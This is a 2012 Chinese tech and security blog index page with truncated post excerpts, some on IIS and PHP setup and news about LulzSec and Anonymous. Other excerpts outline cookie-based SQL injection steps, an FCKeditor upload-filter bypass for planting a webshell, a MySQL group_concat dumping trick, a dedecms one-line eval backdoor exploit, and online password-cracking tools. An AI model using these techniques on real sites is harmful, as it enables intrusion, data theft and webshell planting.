windows下IIS加载Rewrite.dll不成功的解决方法

   
分类:技术 | 2012-04-6 | 撸过 1,632 次
0人扯蛋

windows下IIS加载Rewrite.dll不成功的解决方法

 

症状:加载rewrite模块后,不显示向上的绿箭头,而是向下的红箭头。

 

结果:加载不成功!

 

这个多半都是目录权限的问题!

 

1.Rewrite文件夹一定要有users组的默认权限

 

网上也有说还要加上一下两个权限的,个人觉得没必要,尽是造成安全隐晦的!

 

1.给Rewrite文件夹添加everyone用户,给所有权限

 

2.给Rewrite文件夹加上IIS_WPG用户,给默认权限

 

我的就只有ad[......]

继续阅读

win2008下如何快速安装PHP,并做好安全设置

   
分类:技术 | 2012-04-3 | 撸过 1,256 次
2人扯蛋

虽然现在跑PHP的最佳选择还是Linux,但是随着Windows Server 2008 的出现,前者和后者的差距已经大大缩小,对于不懂Linux操作的朋友,可以丢弃Windows 2003 Server了,选择更好的Windows Server 2008。

 

在Windows Server 2008下配置PHP环境特别的快,只需要鼠标点点就可以了。

 

1,下载PHP5.2系列版本,目前5.2系列比5.3系列兼容性更好。其中又分为Non Thread Safe和Thread Safe版本,如果要用FastCGI模式运行PHP,就选择Non Thread Safe[......]

继续阅读

黑客组织LulzSec复出 公布17万军队成员账户

   
分类:新闻 | 2012-03-29 | 撸过 752 次
0人扯蛋

2011年的7月下旬,黑客组织LulzSec的一些成员被逮捕。该黑客组织曾于2011年在网站MilitarySingles.com上暴露了政府机构和公司成千上万个成员的电子邮件帐户,包括联邦调查局,中央情报局,索尼,甚至PBS。而似乎在沉寂了数个月后,LulzSec又有新动作,声称已经暴露近171,000个军队成员的帐户。

 

“这里有几份电子邮件,比如@us.army.mil carney.navy.mil; greatlakes.cnet.navy.mil @ microsoft.com等”LulzSec组织在PasteBin网站发布了一则警告,并表示“手握”包括单身士兵在交[......]

继续阅读

Cookies注入步骤

   
分类:安全 | 2012-03-26 | 撸过 1,997 次
0人扯蛋

Cookies注入步骤

1)寻找形如“*.asp?id=x”类的带参数的rul

2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的

3)清空浏览器地址,输入“

javascript:alert(document.cookie=“id=”+escape("x"));

按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常,

说明代码是用Request("ID")这种格式收集数据的,可以利用cookies进行注入

4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:"

javascript:javascr[......]

继续阅读

fckeditor上传突破_方法

   
分类:安全 | 2012-03-26 | 撸过 1,069 次
0人扯蛋

有很多已经修补过的fckeditor 我们上传x.asp;y.jpg的时候 通常会变成x_asp;y.jpg 让我们的马失效

 

利用二次上传 可以 生成x(2).asp;y.jpg 可以突破 有些时候打了补丁的 让我们还是无法突破 通常 我们在www.webshell.cc/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

新建 一个x.asp的文件夹 可饶过, 但有些变态的 程[......]

继续阅读

php mysql注入的一种快速有效union方法select出数据库内容

   
分类:安全 | 2012-03-23 | 撸过 1,052 次
0人扯蛋

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。

 

函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)

 

例如:

 

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g

 

那么将得到:

 

1|张三|83023023],|李四|13893232322],.....

 

(注意上面查询结果不是一行多列,而是一行一列)

 

假设原来的sql注入[......]

继续阅读

dedecms 5.7 一句话后门利用 exp

   
分类:安全 | 2012-03-22 | 撸过 1,755 次
0人扯蛋

author:舞林

tx微博:http://t.qq.com/wulinlw

晚上看到这个

http://www.wooyun.org/bug.php?action=view&id=5416

shopcar.class.php 被植入一句话

@eval(file_get_contents('php://input'));

去官网下了一套回来,看了下代码,

class MemberShops
{
    var $OrdersId;
    var $productsId;
    function __construct()
    {
        $this->Orders[......]

继续阅读

在线渗透测试工具集合

   
分类:安全 | 2012-03-22 | 撸过 2,281 次
1人扯蛋

家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用

在线端口扫描:

http://scan.subhashdasyam.com/port-scanner.php

在线VNC扫描:

http://scan.subhashdasyam.com/dumper-with-login.php

在线SSH扫描:

http://scan.subhashdasyam.com/ssh-scanner.php

在线后台地址扫描:

http://scan.subhashdasyam.com/admin-page-finder.php

在线Wordpress管理员密码破解:

http[......]

继续阅读

我国大陆去年2807个政府网站遭篡改

   
分类:新闻 | 2012-03-20 | 撸过 788 次
0人扯蛋

国家互联网应急中心(CNCERT)今天在此间发布的《2011年中国互联网网络安全态势报告》(以下简称“报告”)指出:2011年,我国遭受更为严重复杂的境外网络攻击,网络银行和工业控制系统安全收到的威胁显著上升,恶意程序引发的手机安全事件呈现多发态势。

  ■ 境外攻击来源美国居首

  报告指出,2011年,我国遭受境外网络攻击持续增多,境外有近4.7万个IP地址作为木马或僵尸网络控制服务器,控制我国境内近890万台主机,比2010年控制主机数增长近1倍,其中美国以9500多个IP地址控制我国境内近885万台主机,高居榜首。网站安全方面,境外1.18万多个IP通过植入后门对境内近1.06万个[......]

继续阅读

Anonymous宣称3月31日将使全球互联网瘫痪

   
分类:新闻 | 2012-03-20 | 撸过 715 次
0人扯蛋

黑客组织匿名者(Anonymous)近日对外宣称,将于3月31日攻击13个DNS根服务器,已达到让全球互联网瘫痪的目的,此次攻击作为其发起的“Operation Global Blackout”行动的一部分,是为了抗议“SOPA(美国《网络反盗版法案》)和为了一己私利而置世界于饥饿之中的华尔街银行家与资本家们”。

SOPA/PIPA法案希望进一步强化保护知识产权的力度,当版权方发现侵犯版权内容时,可以要求网站(包括搜索引擎、支付平台、广告平台等)屏蔽所有内容,甚至可以要求互联网接入服务商(ISP)停止向网站提供服务,随后再进行司法程序。并且它规定如果没有"事先采取防盗版的措施",也就是事先[......]

继续阅读